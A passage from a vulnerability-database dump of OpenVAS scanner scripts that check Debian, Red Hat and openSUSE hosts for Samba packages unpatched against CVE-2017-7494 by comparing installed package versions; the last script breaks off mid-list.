isdpkgvuln(pkg:\"libpam-winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libparse-pidl-perl\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbsharemodes-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libsmbsharemodes0\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libwbclient0\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"python-samba\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"registry-tools\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-common-bin\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dbg\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dev\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-doc\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-dsdb-modules\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-libs\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-testsuite\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"samba-vfs-modules\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"smbclient\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"winbind\", ver:\"2:4.2.14+dfsg-0+deb8u6\", rls:\"DEB8\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2018-11-23T00:00:00", "published": "2017-05-25T00:00:00", "id": "OPENVAS:1361412562310871822", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871822", "type": "openvas", "title": "RedHat Update for samba4 RHSA-2017:1271-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2017:1271-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871822\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2017-05-25 06:49:39 +0200 (Thu, 25 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for samba4 RHSA-2017:1271-01\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Samba is an open-source implementation of\nthe Server Message Block (SMB) or Common Internet File System (CIFS) protocol,\nwhich allows PC-compatible machines to share files, printers, and other\ninformation.\n\nSecurity Fix(es):\n\n * A remote code execution flaw was found in Samba. A malicious\nauthenticated samba client, having write access to the samba share, could\nuse this flaw to execute arbitrary code as root. (CVE-2017-7494)\n\nRed Hat would like to thank the Samba project for reporting this issue.\nUpstream acknowledges steelo as the original reporter.\");\n script_tag(name:\"affected\", value:\"samba4 on\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2017:1271-01\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2017-May/msg00035.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.2.10~10.el6_9\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:28:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7494"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-05-27T00:00:00", "id": "OPENVAS:1361412562310851559", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851559", "type": "openvas", "title": "openSUSE: Security Advisory for samba (openSUSE-SU-2017:1415-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851559\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-05-27 06:53:04 +0200 (Sat, 27 May 2017)\");\n script_cve_id(\"CVE-2017-7494\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for samba (openSUSE-SU-2017:1415-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'samba'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for samba fixes the following\n issue: - An unprivileged user with access to the samba server could cause smbd\n to load a specially crafted shared library, which then had the ability to\n execute arbitrary code on the server as 'root'. [CVE-2017-7494, bso#12780,\n bsc#1038231] This update was imported from SUSE:SLE-12-SP1:Update project. NOTE:\n This update is released in openSUSE Leap 42.1 after its official End Of Life\n only because of its severity and potential impact for users that have not\n migrated yet. Please upgrade your openSUSE Leap 42.1 as soon as possible.\");\n\n script_tag(name:\"affected\", value:\"samba on openSUSE Leap 42.1\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:1415-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=openSUSELeap42\\.1\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.1\") {\n if(!isnull(res = isrpmvuln(pkg:\"ctdb\", rpm:\"ctdb~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-debuginfo\", rpm:\"ctdb-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-devel\", rpm:\"ctdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-tests\", rpm:\"ctdb-tests~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"ctdb-tests-debuginfo\", rpm:\"ctdb-tests-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc-devel\", rpm:\"libdcerpc-atsvc-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0\", rpm:\"libdcerpc-atsvc0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-atsvc0-debuginfo\", rpm:\"libdcerpc-atsvc0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0\", rpm:\"libdcerpc-binding0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-binding0-debuginfo\", rpm:\"libdcerpc-binding0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-devel\", rpm:\"libdcerpc-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr-devel\", rpm:\"libdcerpc-samr-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0\", rpm:\"libdcerpc-samr0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc-samr0-debuginfo\", rpm:\"libdcerpc-samr0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0\", rpm:\"libdcerpc0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libdcerpc0-debuginfo\", rpm:\"libdcerpc0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec-devel\", rpm:\"libgensec-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0\", rpm:\"libgensec0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libgensec0-debuginfo\", rpm:\"libgensec0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-devel\", rpm:\"libndr-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac-devel\", rpm:\"libndr-krb5pac-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0\", rpm:\"libndr-krb5pac0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-krb5pac0-debuginfo\", rpm:\"libndr-krb5pac0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt-devel\", rpm:\"libndr-nbt-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0\", rpm:\"libndr-nbt0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-nbt0-debuginfo\", rpm:\"libndr-nbt0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard-devel\", rpm:\"libndr-standard-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0\", rpm:\"libndr-standard0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr-standard0-debuginfo\", rpm:\"libndr-standard0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0\", rpm:\"libndr0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libndr0-debuginfo\", rpm:\"libndr0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi-devel\", rpm:\"libnetapi-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0\", rpm:\"libnetapi0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libnetapi0-debuginfo\", rpm:\"libnetapi0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry-devel\", rpm:\"libregistry-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0\", rpm:\"libregistry0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libregistry0-debuginfo\", rpm:\"libregistry0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials-devel\", rpm:\"libsamba-credentials-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0\", rpm:\"libsamba-credentials0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-credentials0-debuginfo\", rpm:\"libsamba-credentials0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig-devel\", rpm:\"libsamba-hostconfig-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0\", rpm:\"libsamba-hostconfig0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-hostconfig0-debuginfo\", rpm:\"libsamba-hostconfig0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb-devel\", rpm:\"libsamba-passdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0\", rpm:\"libsamba-passdb0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-passdb0-debuginfo\", rpm:\"libsamba-passdb0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy-devel\", rpm:\"libsamba-policy-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0\", rpm:\"libsamba-policy0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-policy0-debuginfo\", rpm:\"libsamba-policy0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util-devel\", rpm:\"libsamba-util-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0\", rpm:\"libsamba-util0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamba-util0-debuginfo\", rpm:\"libsamba-util0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb-devel\", rpm:\"libsamdb-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0\", rpm:\"libsamdb0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsamdb0-debuginfo\", rpm:\"libsamdb0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-devel\", rpm:\"libsmbclient-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw-devel\", rpm:\"libsmbclient-raw-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0\", rpm:\"libsmbclient-raw0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient-raw0-debuginfo\", rpm:\"libsmbclient-raw0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0\", rpm:\"libsmbclient0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbclient0-debuginfo\", rpm:\"libsmbclient0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf-devel\", rpm:\"libsmbconf-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0\", rpm:\"libsmbconf0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbconf0-debuginfo\", rpm:\"libsmbconf0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap-devel\", rpm:\"libsmbldap-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0\", rpm:\"libsmbldap0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libsmbldap0-debuginfo\", rpm:\"libsmbldap0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util-devel\", rpm:\"libtevent-util-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0\", rpm:\"libtevent-util0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libtevent-util0-debuginfo\", rpm:\"libtevent-util0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient-devel\", rpm:\"libwbclient-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0\", rpm:\"libwbclient0~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwbclient0-debuginfo\", rpm:\"libwbclient0-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba\", rpm:\"samba~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client\", rpm:\"samba-client~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-client-debuginfo\", rpm:\"samba-client-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-core-devel\", rpm:\"samba-core-devel~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debuginfo\", rpm:\"samba-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-debugsource\", rpm:\"samba-debugsource~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs\", rpm:\"samba-libs~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-libs-debuginfo\", rpm:\"samba-libs-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-pidl\", rpm:\"samba-pidl~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-python\", rpm:\"samba-python~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-python-debuginfo\", rpm:\"samba-python-debuginfo~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"samba-test\", rpm:\"samba-test~4.2.4~33.1\", rls:\"openSUSELeap42.1\"))) {\n report += 